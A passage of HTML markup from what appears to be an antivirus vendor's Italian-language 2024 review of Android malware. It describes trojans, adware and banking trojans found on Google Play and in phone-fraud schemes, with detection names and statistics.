        Esempi di trojan pubblicitari individuati su Google Play nel 2024. &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4013&lt;/b&gt; si nascondeva nell'app di fotoritocco Cool Fix Photo Enhancer, 
        &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4034&lt;/b&gt; — nella raccolta di immagini Cool Darkness Wallpaper, &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4025&lt;/b&gt; — nel programma per la scansione di 
        codici a barre QR Code Assistant, e &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.656.origin&lt;/b&gt; — nel programma allarme Warning Sound GBD
    &lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        I nostri specialisti inoltre hanno rilevato vari programmi trojan che i malintenzionati hanno protetto da un sofisticato packer software.
    &lt;/p&gt;

    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/14_Android.Packed.57156_2024.0.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/14_Android.Packed.57156_2024.1.png" alt="Android.Packed_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/15_Android.Packed.57159_2024.0.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/15_Android.Packed.57159_2024.1.png" alt="Android.Packed_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        Nell'app Lie Detector Fun Prank si nascondeva il trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Packed&amp;lng=it"&gt;&lt;b&gt;Android.Packed&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.57156&lt;/b&gt;, 
        e nel programma Speaker Dust and Water Cleaner il trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Packed&amp;lng=it"&gt;&lt;b&gt;Android.Packed&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.57159&lt;/b&gt;, i quali erano protetti da un packer
    &lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        Altri programmi malevoli trovati sono stati i campioni della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, 
        che vengono utilizzati in vari schemi fraudolenti. Il principale compito della maggior parte di tali trojan è quello di aprire il link 
        preimpostato, mentre, a determinate condizioni, possono funzionare anche come software dichiarato. Molti di essi venivano distribuiti 
        sotto le finte spoglie di vari programmi finanziari (ad esempio, guide e tutorial, calcolatrici di redditività, applicazioni per l'accesso 
        al trading di borsa, strumenti per la contabilità domestica), taccuini, diari, programmi per la partecipazione a quiz e sondaggi e altri ancora. 
        Essi caricavano siti truffa a tema investimenti.
    &lt;/p&gt;

    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/16_Android.FakeApp.1674_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/16_Android.FakeApp.1674_2024.1.png" alt="Android.FakeApp_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/17_Android.FakeApp.1708_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/17_Android.FakeApp.1708_2024.1.png" alt="Android.FakeApp_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        Esempi di trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; 
        che caricavano link di siti truffa: &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1681&lt;/b&gt; (SenseStrategy), &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1708&lt;/b&gt; (QuntFinanzas)
    &lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        Una parte dei programmi falsificazione &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; veniva distribuita sotto le apparenze di svariati giochi. Molti di essi potevano anche 
        fornire le funzionalità dichiarate, ma il loro compito principale era caricare siti di casinò online e scommesse.
    &lt;/p&gt;

    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/18_Android.FakeApp.1622_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/18_Android.FakeApp.1622_2024.1.png" alt="Android.FakeApp_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/19_Android.FakeApp.1630_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/19_Android.FakeApp.1630_2024.1.png" alt="Android.FakeApp_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        Esempi di trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, spacciati per giochi, che caricavano link di siti di scommesse e casinò online: 
        &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1622&lt;/b&gt; (3D Card Merge Game), &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1630&lt;/b&gt; (Crazy Lucky Candy)
    &lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        Alcuni trojan di questa famiglia di nuovo erano mascherati da applicazioni per la ricerca di lavoro. Tali programmi falsificazione 
        caricano false liste di offerte lavoro e suggeriscono agli utenti di stendere un "curriculum" fornendo i dati personali. In altri casi, 
        i trojan possono invitare le potenziali vittime a mettersi in contatto con il "datore di lavoro" tramite un'app di messaggistica. In realtà, 
        le potenziali vittime scriveranno ai criminali, i quali cercheranno di attirarle in uno o altro schema fraudolento.
    &lt;/p&gt;

    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/20_Android.FakeApp.1627_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/20_Android.FakeApp.1627_2024.1.png" alt="Android.FakeApp_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/21_Android.FakeApp.1703_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/21_Android.FakeApp.1703_2024.1.png" alt="Android.FakeApp_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        Esempi di trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, che venivano spacciati dai malintenzionati per programmi per la ricerca di lavoro: &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1627&lt;/b&gt; 
        (Aimer) &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1703&lt;/b&gt; (FreeEarn)
    &lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        Inoltre, su Google Play sono state rilevate ulteriori applicazioni trojan che iscrivono utenti a servizi a pagamento. 
        Uno di queste era &lt;a href="https://vms.drweb-av.it/search/?q=Android.Subscription&amp;lng=it"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.22&lt;/b&gt; — veniva distribuito sotto le apparenze dell'app di fotoritocco InstaPhoto Editor.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/22_Android.Subscription.22_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/22_Android.Subscription.22_2024.png" alt="Android.Subscriptin_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        Trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Subscription&amp;lng=it"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.22&lt;/b&gt;, studiato per abbonare utenti a servizi a pagamento
    &lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        Altri simili trojan erano i campioni delle famiglie affini &lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.Harly&amp;lng=it"&gt;&lt;b&gt;Android.Harly&lt;/b&gt;&lt;/a&gt;, 
        che hanno un'architettura modulare. Quelli primi sono in grado di scaricare i componenti ausiliari da internet, 
        e quelli secondi differiscono in quanto di solito conservano i moduli necessari in forma crittografata tra le proprie risorse.
    &lt;/p&gt;

    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/23_Android.Joker.2280_2024.png" class="preview"&gt;
                 &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/23_Android.Joker.2280_2024.1.png" alt="Android.Joker_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/24_Android.Harly.82_2024.png" class="preview"&gt;
                 &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/24_Android.Harly.82_2024.1.png" alt="Android.Harly_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;

    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        Esempi di programmi che iscrivevano vittime a servizi a pagamento. &lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2280&lt;/b&gt; 
        era nascosto in un'app con oroscopi, My Horoscope, e &lt;a href="https://vms.drweb-av.it/search/?q=Android.Harly&amp;lng=it"&gt;&lt;b&gt;Android.Harly&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.87&lt;/b&gt; in un gioco, BlockBuster
    &lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        Oltre ai programmi malevoli, gli specialisti Doctor Web hanno rilevato su Google Play nuovi software indesiderati, tra cui erano diverse varianti di 
        &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14&lt;/b&gt;. 
        Questi programmi appartengono a una famiglia di applicazioni che suggeriscono agli utenti di eseguire varie attività (spesso, visualizzare pubblicità) 
        per ricompense virtuali. Le ricompense in seguito presumibilmente potrebbero essere convertite in denaro reale o in premi, ma per ritirare il "guadagno", 
        l'utente dovrebbe accumulare una determinata somma. Tuttavia, anche quando è riuscito a farlo, in fin dei conti, l'utente non riceve alcun pagamento reale.
    &lt;/p&gt;

    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/25_Program.FakeMoney.11_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/25_Program.FakeMoney.11_2024.1.png" alt="Program.FakeMoney_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/26_Program.FakeMoney.14_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/26_Program.FakeMoney.14_2024.1.png" alt="Program.FakeMoney_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        Una delle varianti di &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt; 
        veniva distribuita con il pretesto del gioco Copper Boom, mentre la &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14&lt;/b&gt; era rappresentata dal gioco Merge Party
    &lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        Oltre a ciò, durante l'anno i nostri analisti dei virus rilevavano su Google Play nuovi programmi pubblicitari. Questi includevano applicazioni e 
        giochi con il modulo pubblicitario incorporato &lt;a href="https://vms.drweb-av.it/search/?q=Adware.StrawAd&amp;lng=it"&gt;&lt;b&gt;Adware.StrawAd&lt;/b&gt;&lt;/a&gt;, che è in grado di visualizzare annunci da vari fornitori di servizi.
    &lt;/p&gt;

    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/27_Adware.StrawAd.1_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/27_Adware.StrawAd.1_2024.1.png" alt="Adware.StrawAd_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/28_Adware.StrawAd.3_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/28_Adware.StrawAd.3_2024.1.png" alt="Adware.StrawAd_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/29_Adware.StrawAd.6_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/29_Adware.StrawAd.6_2024.1.png" alt="Adware.StrawAd_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/30_Adware.StrawAd.9_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/30_Adware.StrawAd.9_2024.1.png" alt="Adware.StrawAd_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        Esempi di giochi con il modulo pubblicitario &lt;a href="https://vms.drweb-av.it/search/?q=Adware.StrawAd&amp;lng=it"&gt;&lt;b&gt;Adware.StrawAd&lt;/b&gt;&lt;/a&gt;: 
        Crazy Sandwich Runner (&lt;a href="https://vms.drweb-av.it/search/?q=Adware.StrawAd&amp;lng=it"&gt;&lt;b&gt;Adware.StrawAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;), 
        Poppy Punch Playtime (&lt;a href="https://vms.drweb-av.it/search/?q=Adware.StrawAd&amp;lng=it"&gt;&lt;b&gt;Adware.StrawAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3&lt;/b&gt;), 
        Finger Heart Matching  (&lt;a href="https://vms.drweb-av.it/search/?q=Adware.StrawAd&amp;lng=it"&gt;&lt;b&gt;Adware.StrawAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.6&lt;/b&gt;), 
        Toimon Battle Playground (&lt;a href="https://vms.drweb-av.it/search/?q=Adware.StrawAd&amp;lng=it"&gt;&lt;b&gt;Adware.StrawAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.9&lt;/b&gt;)
    &lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        Su Google Play venivano distribuite anche le applicazioni pubblicitarie &lt;b&gt;Adware.Basement&lt;/b&gt;, gli 
        annunci da cui spesso portano a siti dannosi e fraudolenti. È interessante notare che questa famiglia 
        ha una base di codice comune con i programmi indesiderati &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;.
    &lt;/p&gt;

    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/31_Adware.Basement.1_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/31_Adware.Basement.1_2024.1.png" alt="Adware.Basement_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/32_Adware.Basement.1_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/32_Adware.Basement.1_2024.1.png" alt="Adware.Basement_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/33_Adware.Basement.1_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/33_Adware.Basement.1_2024.1.png" alt="Adware.Basement_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/34_Adware.Basement.2_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/34_Adware.Basement.2_2024.1.png" alt="Adware.Basement_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        Esempi di programmi pubblicitari indesiderati &lt;b&gt;Adware.Basement&lt;/b&gt;: Lie Detector: 
        Lie Prank Test, TapAlarm:Don't touch my phone e Magic Voice Changer — &lt;b&gt;Adware.Basement.1&lt;/b&gt;, 
        Auto Clicker:Tap Auto — &lt;b&gt;Adware.Basement.2&lt;/b&gt;
    &lt;/em&gt;&lt;/p&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="troj"&gt;
    &lt;h2 class="alignCenter"&gt;Trojan bancari&lt;/h2&gt;
    &lt;p&gt;
        Secondo i dati delle statistiche di rilevamento di Dr.Web Security Space per dispositivi mobili, nel 2024 la quota dei 
        trojan bancari sul numero totale di malware registrati ha ammontato al 6,29%, il che è di 2,71 pp. in più rispetto all'anno 
        prima. Da gennaio la loro attività diminuiva regolarmente, ma da metà di primavera il numero di attacchi è ricominciato 
        a crescere. Durante il III trimestre, la loro attività rimaneva praticamente invariata, dopo di che è continuata ad aumentare 
        raggiungendo un massimo annuale a novembre.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/35.1_banker_2024_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/35.1_banker_2024_en.png" alt="Banker_Stat_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;
        Nel 2024 di nuovo risultano largamente diffuse le note famiglie di trojan bancari. 
        Tra di esse — i programmi malevoli &lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot.Coper&amp;lng=it" target="_blank" rel="noopener noreferrer"&gt;Coper&lt;/a&gt;, 
        Hydra (&lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1048.origin&lt;/b&gt;, &lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.563.origin&lt;/b&gt;), 
        Ermac (&lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1015.origin&lt;/b&gt;, &lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.15017&lt;/b&gt;), 
        Alien (&lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.745.origin&lt;/b&gt;, &lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1078.origin&lt;/b&gt;), 
        Anubis (&lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.670.origin&lt;/b&gt;). 
        Inoltre, si osservavano attacchi con l'utilizzo delle famiglie Cerberus (&lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11404&lt;/b&gt;), 
        GodFather (&lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.GodFather.3&lt;/b&gt;, &lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.GodFather.14.origin&lt;/b&gt;) e Zanubis (&lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.Zanubis.7.origin&lt;/b&gt;).
    &lt;/p&gt;
    &lt;p&gt;
        Nel corso dell'anno i malintenzionati distribuivano attivamente i trojan spia &lt;b&gt;Android.SpyMax&lt;/b&gt;, che possiedono un ampio set di funzionalità malevole, 
        inclusa la possibilità di gestione in remoto dei dispositivi infetti. Vengono ampiamente adoperati anche come trojan bancari. Questa famiglia originalmente 
        includeva un trojan RAT multifunzionale SpyNote (RAT — Remote Administration Trojan, trojan di accesso remoto). Tuttavia, dopo la fuga del suo codice sorgente, 
        sulla sua base sono comparse le più svariate mods — ad esempio, CraxsRAT e G700 RAT. Le statistiche di rilevamento di Dr.Web Security Space per dispositivi 
        mobili mostrano che i campioni di questa famiglia sono diventati più attivi nella seconda metà del 2023, e da quel tempo il numero dei loro rilevamenti continuava 
        a crescere praticamente ogni mese. Per ora questa tendenza persiste.
    &lt;/p&gt;
    &lt;p&gt;
        I trojan &lt;b&gt;Android.SpyMax&lt;/b&gt; sono mirati agli utenti in tutto il mondo. L'anno passato, essi sono stati notati, tra l'altro, in numerosi attacchi agli utenti russi — 
        il 46,23% dei rilevamenti della famiglia riguardava questo pubblico. Questi malware venivano attivamente distribuiti anche tra i proprietari di dispostivi Android 
        brasiliani (il 35,46% dei rilevamenti) e turchi (il 5,80% dei rilevamenti).
    &lt;/p&gt;
    &lt;p&gt;
        È interessante notare che la distribuzione di questi programmi malevoli in Russia avviene principalmente non attraverso lo spam o le classiche varianti di phishing, 
        ma durante una delle fasi della frode telefonica. All'inizio i truffatori che chiamano la potenziale vittima tradizionalmente cercano di convincerla che loro sono 
        collaboratori di una banca o delle forze dell'ordine. Segnalano un presunto problema — un tentativo di furto di denaro dal conto bancario o di formalizzazione di 
        un prestito non previsto, oppure, al contrario, comunicano "buone notizie" su presunti bonus statali spettanti. Quando i truffatori capiscono che l'utente ha creduto 
        loro, lo incoraggiano a installare un "aggiornamento dell'antivirus", "un'app bancaria" o un altro programma — ad esempio, quello per "la sicurezza della transazione". 
        In tale programma in realtà è nascosto il trojan &lt;b&gt;Android.SpyMax&lt;/b&gt;.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/36_Android.SpyMax_share_2024_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/36_Android.SpyMax_share_2024_en.png" alt="Android.SpyMax_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;
        Gli utenti da Russia nel 2024 anche riscontravano le famiglie di banker Falcon (&lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.988.origin&lt;/b&gt;, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5703&lt;/b&gt;) 
        e Mamont (&lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.637.origin&lt;/b&gt;, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.712.origin&lt;/b&gt;). Oltre a ciò, sono stati notati attacchi dei trojan bancari 
        &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.791.origin&lt;/b&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.829.origin&lt;/b&gt; ai proprietari di dispostivi Android da Russia e Uzbekistan, nonché quelli del banker 
        &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.802.origin&lt;/b&gt; agli utenti in Russia, Azerbaigian e Uzbekistan. L'obiettivo del trojan
        &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.757.origin&lt;/b&gt; sono stati gli utenti da Russia, Uzbekistan, Tagikistan e Kazakistan.
    &lt;/p&gt;
    &lt;p&gt;
        I nostri specialisti di nuovo registravano attacchi dei trojan MoqHao (&lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.367.origin&lt;/b&gt;, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.430.origin&lt;/b&gt;, 
